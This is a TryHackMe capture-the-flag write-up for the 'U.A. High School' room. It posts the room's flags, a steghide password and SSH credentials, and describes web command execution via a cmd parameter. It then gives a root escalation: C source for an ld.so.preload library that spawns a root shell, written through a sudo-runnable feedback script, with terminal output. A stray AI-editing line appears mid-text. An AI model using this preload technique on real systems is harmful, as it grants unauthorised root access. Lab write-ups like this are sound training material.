Let’s discuss U.A. High School
.
OMG no attack vector
Directory scanning, subdomain enum, parameter fuzzing, nothing gave a result
The TryHackMe staff are not able to classify challenges
A fantasy room based on an anime. It shouldn’t even be on TryHackMe. It’s just designed to waste people’s time. I’ll share the flags and a write-up here to save you time. Please dislike the room to show that you deserve better ones
User Flag: THM{W3lC0m3_D3kU_1A_0n3f0rAll??}
Root Flag: THM{Y0U_4r3_7h3_NUm83r_1_H3r0}
Here’s a refined version of your content with grammar corrections and clarity improvements:
- Execute the command via
/assets/index.php?cmd=ls
. (wtf!!) - Find the hidden image and fix its magic bytes.
- Use steghide to extract the data inside it. Password:
AllmightForEver!!!
. - Using the following credentials, log in via SSH:
deku:One?For?All_!!one1/A
. - Get the user flag.
Check sudo -l
deku@myheroacademia:/tmp$ sudo -l
[sudo] password for deku:
Matching Defaults entries for deku on myheroacademia:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User deku may run the following commands on myheroacademia:
(ALL) /opt/NewComponent/feedback.sh
deku@myheroacademia:/tmp$ sudo /opt/NewComponent/feedback.sh
Hello, Welcome to the Report Form
This is a way to report various problems
Developed by
The Technical Department of U.A.
Enter your feedback:
asd > test.txt
Notice that you can write files as root. We can use this to escalate privileges.
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unlink("/etc/ld.so.preload");
setgid(0);
setuid(0);
system("/bin/bash");
}
// cd /tmp
// gcc -fPIC -shared -o pe.so pe.c -nostartfiles
After compiling and transferring the library, copy it to /tmp
and execute any binary with the SUID bit. I ran sudo
to trigger the loading of the preload library.
deku@myheroacademia:/tmp$ sudo /opt/NewComponent/feedback.sh
Hello, Welcome to the Report Form
This is a way to report various problems
Developed by
The Technical Department of U.A.
Enter your feedback:
/tmp/pe.so > /etc/ld.so.preload
Feedback successfully saved.
deku@myheroacademia:/tmp$ /usr/bin/sudo
root@myheroacademia:/tmp# cd /root
root@myheroacademia:/root# ls
root.txt snap
root@myheroacademia:/root# cat root.txt
For an easier privilege escalation technique, you can also check this write-up.
why the /assets path so tricky? really frustrating!